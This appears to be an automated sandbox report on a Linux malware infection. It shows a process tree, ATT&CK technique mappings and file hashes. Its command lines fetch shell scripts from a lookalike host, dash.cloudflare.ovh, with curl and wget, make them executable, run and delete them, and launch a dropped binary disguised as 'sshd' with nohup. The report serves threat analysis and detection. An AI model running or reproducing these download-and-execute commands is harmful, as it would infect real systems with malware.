/usr/bin/curlcurl http://dash.cloudflare.ovh/mvt/brict.sh -s -o /var/tmp/brict.sh3⤵PID:1713
-
-
/usr/bin/chmodchmod 777 /var/tmp/brict.sh3⤵
- File and Directory Permissions Modification
PID:1715
-
-
/var/tmp/brict.sh./brict.sh3⤵
- Executes dropped EXE
PID:1716
-
-
/usr/bin/rmrm brict.sh3⤵PID:1717
-
-
/usr/bin/flock/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"3⤵PID:1718
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/3⤵PID:1719
-
-
/usr/bin/chmodchmod 777 /var/tmp/retrict.sh3⤵
- File and Directory Permissions Modification
PID:1720
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/mvt/retrict.sh -s -o /var/tmp/retrict.sh3⤵PID:1721
-
-
/usr/bin/chmodchmod 777 /var/tmp/retrict.sh3⤵
- File and Directory Permissions Modification
PID:1723
-
-
/var/tmp/retrict.sh./retrict.sh3⤵
- Executes dropped EXE
PID:1724
-
-
/usr/bin/rmrm retrict.sh3⤵PID:1725
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/3⤵PID:1726
-
-
/usr/bin/chmodchmod 777 /var/tmp/politrict.sh3⤵
- File and Directory Permissions Modification
PID:1727
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/mvt/politrict.sh -s -o /var/tmp/politrict.sh3⤵PID:1728
-
-
/usr/bin/chmodchmod 777 /var/tmp/politrict.sh3⤵
- File and Directory Permissions Modification
PID:1730
-
-
/var/tmp/politrict.sh./politrict.sh3⤵
- Executes dropped EXE
PID:1731
-
-
/usr/bin/rmrm politrict.sh3⤵PID:1732
-
-
/usr/bin/flock/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"3⤵PID:1733
-
-
-
/usr/bin/rmrm -rf loadbit ovlcap seasbit2⤵PID:1734
-
-
/usr/bin/nohupnohup ./sshd1⤵PID:1636
-
/var/tmp/sshd./sshd1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1636
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17KB
MD5593e9551a4a9b49323a1fda81fe1dd5e
SHA13ea957516c02bc2e57ce17401b56e5f2f0288725
SHA2562b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab
SHA51226a3a00e55e742d5d44c90725716417f2399c517ac5d462e0458535f05d656d70b1cc714bc1c8ecb4e6a94d68ed3b47bfaace7645634cfd236057b621a10c518
-
Filesize
14KB
MD58e3e276e650e6ea21bea16c8c2f3e8c3
SHA1e483074bbe5e41cacbe081f290d7e6b0c3184c7f
SHA2564dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f
SHA5128b33a40fd39a06a85169f2e4c4172a4d44ec24d50c512db7231ab4575dbf4093bfdabc63dd1b36dda94ec87772469e659abf0650d8982a526d8623a96bf93e38
-
Filesize
1KB
MD5932df67ea6b8900a30249e311195a58f
SHA1d6b7c2388a75c2c3b71d5ad7130f1d3dfeb7fd83
SHA256e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d
SHA512f6801c3cbc1d28e8f4a5373340081528dc1ece23e59585cc45831177710ac785557ebf364bd8a867f0c687ca518f41913427b27ddd2f2ff64e64ae7ba760fc0c
-
Filesize
176B
MD51085964ef7588f30f5452b53512e0421
SHA18c2717e080ad222d96187c8692dbeb00c358f110
SHA25616c20bdd80428a1915a82bb85d683edb716e786e47d3b361ba46744bf798f1f5
SHA5124b00f9fa4e975fc30a6f39e5de574057af5a74ced82f508f952e3b6de43dd6a9a9b77b358b748f3bae02bbeff6bac258263e899756038a627c2ea832d79b9a8d
-
Filesize
523B
MD5c26977c7da5a416f75bcb27fa49f240c
SHA100b6ef14e50c7f421e2b46c8cc5a266ca4a45eb0
SHA256519c53996f53aad47c366373dcaace8af605bf32e40a3ac16d135a6d13514c5a
SHA512356a11b82a111e8c86695308c31eb999d870d07c6b4e8be7405c2089b3f2583f04b2a4b5d89420fb0cd6fe51d7f8b611d88d81040ff4fc5cab9fbce9dea7a8e3
-
Filesize
593B
MD515c78dccef14d5cb3acf9cda4df92b0a
SHA1c6d04609a285d5b86d3b55aabda1b5969c432c56
SHA256de67580337bb6886bb437b3ef504dfb5aa34dd7d1041de22ba7075ca4cbc53be
SHA512ef221c2dcb794580add811b46b415be30eb2b4ac24ca68c401865af3abd76f5338f5449d1ed8ae1da7e99e3b7b0c149273bfb2b5155f04aff9d57a985fa53187
-
Filesize
200B
MD58677d3acf751217ec3c3161ce266e748
SHA1b3bdad150a3d12080a8b0e4942dd1c04ca08dd60
SHA25664a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4
SHA512cc42b48bd45bdadad56b360fbd2e2176f603f339c8a37236cfa4370b8ac66300a3408eba041a9fd54af3fc9296541ef2a09c5e990c29f51cc09cd26d502def5a
-
Filesize
1KB
MD5eae740299e852ad90a690e29e0f436e5
SHA1e11b1d8e042a70ed10ec3dcfe2fb2d44570dd84c
SHA2564837501c5271d76200862fe677dcdbda6552d483c6f7100873e3c04bc9dce51e
SHA512acdc41057dfb45548d12bb4e4feab79f7484518ca1a10e219f455f59a18d5f53444b786aa47f6d85ffa49383ba539745c6a7f4d79935f169ce3dc07b03081df4
-
Filesize
1KB
MD58ecdf266fc81cd1ba7cd4d97f3bf0e0d
SHA1c717efa67280f37ae572e27a3636976a7ca23580
SHA256fe44ef6490fd7534cef77eea7521634d6a5c49388b1c0051ba6432a85a3c5df7
SHA5125167a4f2cfac3efb7428705f8b349d7b69f62ff3594c621a3111eb1f5f8fb26e04c02c8ae87d6ac9090260065e0fefb963e84305126dc5b132396a631f8cc8f8
-
Filesize
201B
MD5bce9227af9bd25ffa6937bb73739366c
SHA1a5191f835b7e419a05b10020dcafce812927a851
SHA256623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955
SHA5122432e1da87d06038bdde5fd0e9d46113e4365c913348720e9c22e986ca37988857e969e99cb17b562fbe757c8dc8c02c652e06a0b93535ed7641826072084b1a
-
Filesize
754B
MD53c5e78207f8d379aafaca253de523b4d
SHA11df83ca30a444077c73f9058033d1c89a1c6fc6f
SHA2569361a4af04108f51720120deb02b4af65ddf76077a91ec7288bc24fe6ebcffa8
SHA512c5c8ba69115f9bc9e80ea84c15132e1794b6d9d22a0f9e6e922970ff53b002238a39d8f4e17b477ff9612f226f3112de3f550bbb823d75c719fe9498131d3feb
-
Filesize
6.7MB
MD550eafe708b0e411d6f5d31ce3ce14ec8
SHA124e6d617badd100b28061e01b7c3e1bff9266fac
SHA256604b694943267865160c335e10efa0375ff8fc29589326dbf1a3939d321ca5c0
SHA5128e928f15e5124e5722e9554ed480a89c045b2bd34f3607e027a04101f8d375371eedb5651b74c152f5e2e89edbe5ebc1f34de61454096e6a92cbf2fb3b32e741
-
Filesize
754B
MD500d7b8d6915e67fa3c1288e36b616b20
SHA18eb8ef37fe36fef617f1fb613cfe4861942b7556
SHA256945212240921d8e1fa85a8c381ceb4a7e8299c3aefdeb49194a2bedfdf753522
SHA5129655cc64f27dec5616a32aa8509119af3ca0dc1374c02a0e00aa25c6641f6b7e2d48970f8c2dd8a98a590026fccd5a1654a9539f056be855c887d1b64e1e9fff
-
Filesize
189B
MD555e75cb054e32f52a306f8c79ca8083b
SHA11faf6b67cc8ac3e18118413f209e01bb9d821faa
SHA25605727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464
SHA51218ddf3497c9cc9b1d8d54bc7876949df31cdf9e250411995003014c0b4ea4b6618c5a7eee7eaf62af4152378d26da476ff82536c334158757dd8168d46e7c2b2